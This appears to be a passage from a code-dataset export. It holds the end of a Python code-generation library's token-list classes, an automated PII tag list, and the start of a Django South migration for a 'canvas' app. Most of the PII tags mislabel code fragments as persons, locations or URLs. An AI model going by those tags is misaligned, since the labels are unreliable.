for i, elem in enumerate(elem_list):
if not isinstance(elem, self.node_classinfo):
elem = self.node_factory(elem)
self.node_list.insert(index+i, elem)
def index(self, *args, **kwargs):
return self.node_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.node_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.node_list.pop(*args, **kwargs)
def reverse(self):
self.node_list.reverse()
def remove(self, *args, **kwargs):
self.node_list.remove(*args, **kwargs)
@abc.abstractmethod
def __add__(self, other):
return type(self)((self, other))
@abc.abstractmethod
def __radd__(self, other):
return type(self)((other, self))
def __iadd__(self, other):
other_list = listify(other)
typed_other_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in other_list
]
self.node_list.extend(typed_other_list)
return self
def append(self, other):
self.__iadd__(other)
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy.node_list = self.node_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self.node_list *= other
return self
else:
return NotImplemented
def __contains__(self, item):
return item in self.node_list
def __reversed__(self):
return reversed(self.node_list)
def __getitem__(self, key):
return self.node_list[key]
def __setitem__(self, key, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
self.node_list[key] = value
def __delitem__(self, key):
del self.node_list[key]
def __len__(self):
return len(self.node_list)
def __iter__(self):
return iter(self.node_list)
class TokenListABC(NodeBase, NonIterable, collections.MutableSequence):
""""""This class is an abstract base class for all classes that are token lists.
A token list is an object that holds a sequence of tokens, which get concatenated when printed.
The tokens are turned into strings only when the token list is printed, which is why it is
the lazy building blocks of source code constructs like expressions and many others.
Whan printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,
or the builtin :func:`str` otherwise.
""""""
pass
class DelegatedTokenListBase(TokenListABC):
""""""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API
to an attribute.
This class implements stubs to allow transparent object composition.
""""""
@property
def tokenlist_attr(self):
""""""This property gives the attribute holding the real token list.""""""
attr = getattr(self, self.tokenlist_attr_name)
if not isinstance(attr, TokenListABC):
raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC')
else:
return attr
@tokenlist_attr.setter
def tokenlist_attr(self, value):
return setattr(self, self.tokenlist_attr_name, value)
def __init__(self, tokenlist_attr_name, *args, **kwargs):
""""""
:param tokenlist_attr_name: the name of the attribute holding the real token list
""""""
self.tokenlist_attr_name = tokenlist_attr_name
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
return self.tokenlist_attr.inline_str(idt)
def freestanding_str(self, idt=None):
return self.tokenlist_attr.freestanding_str(idt)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self.tokenlist_attr.insert(*args, **kwargs)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.tokenlist_attr.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.tokenlist_attr.pop(*args, **kwargs)
def reverse(self):
self.tokenlist_attr.reverse()
def remove(self, *args, **kwargs):
self.tokenlist_attr.remove(*args, **kwargs)
def __add__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)
return self_copy
def __radd__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)
return self_copy
def append(self, other):
self.tokenlist_attr.append(other)
def __iadd__(self, *args, **kwargs):
self.tokenlist_attr.__iadd__(*args, **kwargs)
return self
def extend(self, other_list):
self.tokenlist_attr.extend(other_list)
def __mul__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)
return self_copy
def __rmul__(self, *args, **kwargs):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)
return self_copy
def __imul__(self, other):
self.tokenlist_attr.__imul__(other)
return self
def __contains__(self, *args, **kwargs):
return self.tokenlist_attr.__contains__(*args, **kwargs)
def __iter__(self):
return self.tokenlist_attr.__iter__()
def __reversed__(self):
return self.tokenlist_attr.__reversed__()
def __getitem__(self, key):
return self.tokenlist_attr.__getitem__(key)
def __setitem__(self, key, value):
self.tokenlist_attr.__setitem__(key, value)
def __delitem__(self, key):
self.tokenlist_attr.__delitem__(key)
def __len__(self):
return self.tokenlist_attr.__len__()
class TokenListBase(TokenListABC):
""""""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic.
""""""
def __init__(self, token_list=None, *args, **kwargs):
""""""
:param token_list: the list of tokens to store inside the token list
""""""
self._token_list = listify(token_list)
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
""""""Print the tokens of the token list usin, and concatenate all the strings.
If the token is a :class:`NodeABC`, its *inline_str* method is used.
otherwise, :func:`str` builtin is called on the token.
""""""
string = ''
for token in self._token_list:
if token is self:
# Special handling of self: allows to print itself using
# a different method to avoid infinite recursion and to provide
# a mean to subclasses to implement self printing without creating a
# ""self-printer"" class dedicated to printing themselves
string += self.self_inline_str(idt)
elif isinstance(token, NodeABC):
string += token.inline_str(idt)
else:
string += str(token)
return string
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self._token_list.insert(*args, **kwargs)
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self._token_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self._token_list.pop(*args, **kwargs)
def reverse(self):
self._token_list.reverse()
def remove(self, *args, **kwargs):
self._token_list.remove(*args, **kwargs)
def __add__(self, other):
if isinstance(other, TokenListABC):
other_list = list(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
# The result of the addition with a NodeContainer is a NodeContainer
elif isinstance(other, NodeContainerBase):
return other.__radd__(self)
else:
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
def __radd__(self, other):
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = other_list+self._token_list
return self_copy
def append(self, other):
if isinstance(other, TokenListABC):
other_list = tuple(other)
else:
other_list = listify(other)
self._token_list.extend(other_list)
return self
def __iadd__(self, *args, **kwargs):
self.append(*args, **kwargs)
return self
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy._token_list = self._token_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, *args, **kwargs):
return self.__mul__(*args, **kwargs)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self._token_list *= other
return self
else:
return NotImplemented
def __contains__(self, *args, **kwargs):
return self._token_list.__contains__(*args, **kwargs)
def __iter__(self):
return iter(self._token_list)
def __reversed__(self):
return reversed(self._token_list)
def __getitem__(self, key):
return self._token_list[key]
def __setitem__(self, key, value):
self._token_list[key] = value
def __delitem__(self, key):
del self._token_list[key]
def __len__(self):
return len(self._token_list)
class _IndentedTokenListBase:
""""""This class is the base class that implements a token list which indents its content when printed.""""""
def inline_str(self, idt=None):
idt = Indentation.ensure_idt(idt)
snippet = super().inline_str(idt)
indented_new_line = ""\n""+str(idt)
snippet = snippet.replace(""\n"", indented_new_line)
return snippet
class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):
""""""This class is a base class for token lists that indent their content when printed.""""""
pass
class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):
""""""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`.""""""
pass
class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):
""""""This base class allows the instances to record the backtrace of the Python code that
created them.
This allows one to add comments in generated source code showing which file and line of the Python
script was responsible for creating it. This is a facility when debugging the source code generator,
and can avoid headache when ones want to track down which line of Python generated which line of
generated source code.
As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.
""""""
__frame_format_string = '{filename}:{lineno}({function})'
__frame_joiner = ', '
def __init__(self, level=0, *args, **kwargs):
stack = inspect.stack()
self.stack_frame_list = [
frame[1:] for frame in stack
if os.path.dirname(frame[1]) != os.path.dirname(__file__)
]
super().__init__(self, *args, **kwargs)
@abc.abstractmethod
def freestanding_str(self, idt=None):
#Construct a comment by giving itself as a token and use its freestanding_str method
pass
def self_inline_str(self, idt=None):
return self.__frame_joiner.join(
self.__frame_format_string.format(
filename = os.path.relpath(frame[0]),
lineno = frame[1],
function = frame[2],
line_content = frame[3][frame[4]] if frame[3] is not None else ''
) for frame in self.stack_frame_list
)
",41613,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', ""bases[0].__dict__['_'+bases[0].__name__+'__format_string""], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', ""ValueError('node_classinfo""], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']]"
41,"# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.execute(""create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"")
def backwards(self, orm):
raise RuntimeError(""Cannot reverse this migration."")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': ""('content_type__app_label', 'content_type__model', 'codename')"", 'unique_together': ""(('content_type', 'codename'),)"", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['contenttypes.ContentType']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Group']"", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'canvas.apiapp': {
'Meta': {'object_name': 'APIApp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'canvas.apiauthtoken': {
'Meta': {'unique_together': ""(('user', 'app'),)"", 'object_name': 'APIAuthToken'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.APIApp']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.bestof': {
'Meta': {'object_name': 'BestOf'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'best_of'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}),
'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'best_of'"", 'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {})
},
'canvas.category': {
'Meta': {'object_name': 'Category'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}),
'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'founded_groups'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': ""'moderated_categories'"", 'symmetrical': 'False', 'to': ""orm['auth.User']""}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.comment': {
'Meta': {'object_name': 'Comment'},
'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}),
'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'replies'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Comment']""}),
'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}),
'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}),
'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'used_in_comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}),
'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}),
'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.commentflag': {
'Meta': {'object_name': 'CommentFlag'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['auth.User']""})
},
'canvas.commentmoderationlog': {
'Meta': {'object_name': 'CommentModerationLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderated_comments_log'"", 'to': ""orm['auth.User']""}),
'visibility': ('django.db.models.fields.IntegerField', [], {})
},
'canvas.commentpin': {
'Meta': {'object_name': 'CommentPin'},
'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.commentsticker': {
'Meta': {'object_name': 'CommentSticker'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'stickers'"", 'to': ""orm['canvas.Comment']""}),
'epic_message': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '140', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['auth.User']"", 'null': 'True', 'blank': 'True'})
},
'canvas.commentstickerlog': {
'Meta': {'object_name': 'CommentStickerLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.content': {
'Meta': {'object_name': 'Content'},
'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}),
'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'remixes'"", 'null': 'True', 'to': ""orm['canvas.Content']""}),
'remix_text': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '1000', 'blank': 'True'}),
'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'blank': 'True'}),
'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': ""'used_as_stamp'"", 'blank': 'True', 'to': ""orm['canvas.Content']""}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.ContentUrlMapping']"", 'null': 'True', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.contenturlmapping': {
'Meta': {'object_name': 'ContentUrlMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.emailunsubscribe': {
'Meta': {'object_name': 'EmailUnsubscribe'},
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.externalcontent': {
'Meta': {'object_name': 'ExternalContent'},
'_data': ('django.db.models.fields.TextField', [], {'default': ""'{}'""}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'external_content'"", 'to': ""orm['canvas.Comment']""}),
'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'null': 'True', 'blank': 'True'})
},
'canvas.facebookinvite': {
'Meta': {'object_name': 'FacebookInvite'},
'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""})
},
'canvas.facebookuser': {
'Meta': {'object_name': 'FacebookUser'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'canvas.followcategory': {
'Meta': {'unique_together': ""(('user', 'category'),)"", 'object_name': 'FollowCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'followers'"", 'to': ""orm['canvas.Category']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'following'"", 'to': ""orm['auth.User']""})
},
'canvas.invitecode': {
'Meta': {'object_name': 'InviteCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""})
},
'canvas.remixplugin': {
'Meta': {'object_name': 'RemixPlugin'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.stashcontent': {
'Meta': {'object_name': 'StashContent'},
'content': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']"", 'null': 'True'}),
'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
